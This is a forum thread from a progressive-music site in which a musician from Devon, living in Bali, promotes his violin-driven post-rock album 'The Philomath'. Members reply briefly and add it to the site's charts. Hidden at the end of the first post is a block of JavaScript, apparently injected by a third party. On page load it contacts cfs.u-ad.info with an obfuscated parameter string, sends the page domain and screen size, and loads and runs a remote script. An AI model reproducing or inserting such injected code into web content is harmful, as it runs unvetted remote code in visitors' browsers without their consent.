Forum Home Forum Home > Progressive Music Lounges > Suggest New Bands and Artists
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Topic ClosedTransmigrant - Math/Post-Rock

Post Reply Post Reply
Author
Forum Newbie
Forum Newbie

Direct Link To This Post Topic: Transmigrant - Math/Post-Rock
    Posted: September 20 2015 at 06:18
Created in 2014, Transmigrant (being one lost and excitable soul going by the name of Sam Morgan) is currently in Bali, Indonesia, though originally from Devon, England.

The Philomath is my new album. It is supposed to be a bit of an adventure across genres and themes, while retaining a violin/piano core. I wanted the album to speak so found voices in great poetry and amazing scientists (physics was my degree so I wanted to share my admiration for the spectacular awesomeness of the universe). 

A big influence on the album was The Ascent of Everest’s From This Vantage which has a flow and beauty that leaves me with huge man tears rolling down the cheeks. 

The album can be heard at

transmigrantmusic.com

And downloaded (free of charge) at 

transmigrant.bandcamp.com

Album details:

Transmigrant - The philomath

A raw violin driven electronic voyage across the vast ocean of empty space between the lugholes.

The Philomath - 7:04

Vagrant - 7:22

Halley's Comet - 5:38

Isostasy - 6:18

Three Sheets - 6:32

Papuan Prayer - 3:30

Youth and Age and All In Between - 7:18

Core - 4:48

Like Gravity - 10:28

Almost everything - Sam Morgan

Vocals on Isostasy and Core - Grace Marsell.

Poetry featured:

Vagrant: Charles Bukowski – The Soldier, His Wife and the Bum

Halley’s Comet: Stanley Kunitz – Halley’s Comet

Youth and Age: John Betjeman – Youth and Age on Beaulieu River

Core: Adrian Henri – Death in the Suburbs

Like Gravity: Jean Binta Breeze – Earth Cries

Scientists featured:

Carl Sagan

Richard Feynman

Hope you guys find the time to consider it.

Cheers,

Sam Morgan

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRSNVcfhO3YvtuqPJSOfWHEWUoTTRaa31yl%2fRI0I%2f2JXEs1Hiz3LMFQxQe1N8EsWyAeaD%2b17NiGxaSlp%2f6Gwo0HFUSaWaEDauLoeG0U5lc%2fGifsQbktxBtRJuP7MXdOR1%2fuealAWfqE2%2fkbjwZW%2fxZ6bC8dctIUUfL2rh7W0KVH0YeBo3Fjeu%2bbsd%2bfJqPdvTRPnhrG1V2ahsazyFsNAIVPZVZ9enoZC7sflx1n%2f4MaTe2twXAIYmfgr5YkcdxuvcqzJu8EcJNFa8Jz2IYwkpWReftbCj0Sq2tga24YN9Ko%2f1y6r3neFN4CzfTxZ%2feXShuhpEJTooAY3pt79UYJHwj30LUJh345tFmLba%2fMErt9u02VJwpbpestX8okEI5noXQxy3K5bl3lZFLIKPcXFqPHoIGpSEflXcNLvsnD2%2f1m5kEZ%2ffq%2bNPPSqFTT6rYHnE0E6Xkhc3Q6VwNuxN%2fkSSun1exLB8PRHLFJ9ObN%2fOx6xzk0HY1Ox1T1D9g%2f5l359GOQXWlzsEAXIRFWSOApnFxvI44tLNWKDTV4g37rEQH8sKclWy9HJ2M7QsX55Stxd3TSweiY2KPsm8CODesuLatIM4wd2ZTqs6S" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
zravkapt View Drop Down
Special Collaborator
Special Collaborator
Honorary Collaborator

Direct Link To This Post Posted: September 20 2015 at 09:00
I'll get back to you on this.
Magma America Great Make Again
zravkapt View Drop Down
Special Collaborator
Special Collaborator
Honorary Collaborator

Direct Link To This Post Posted: September 20 2015 at 09:31
Interesting. Classical and jazz inspired modern post. Added to our charts.
Magma America Great Make Again
 Post Reply Post Reply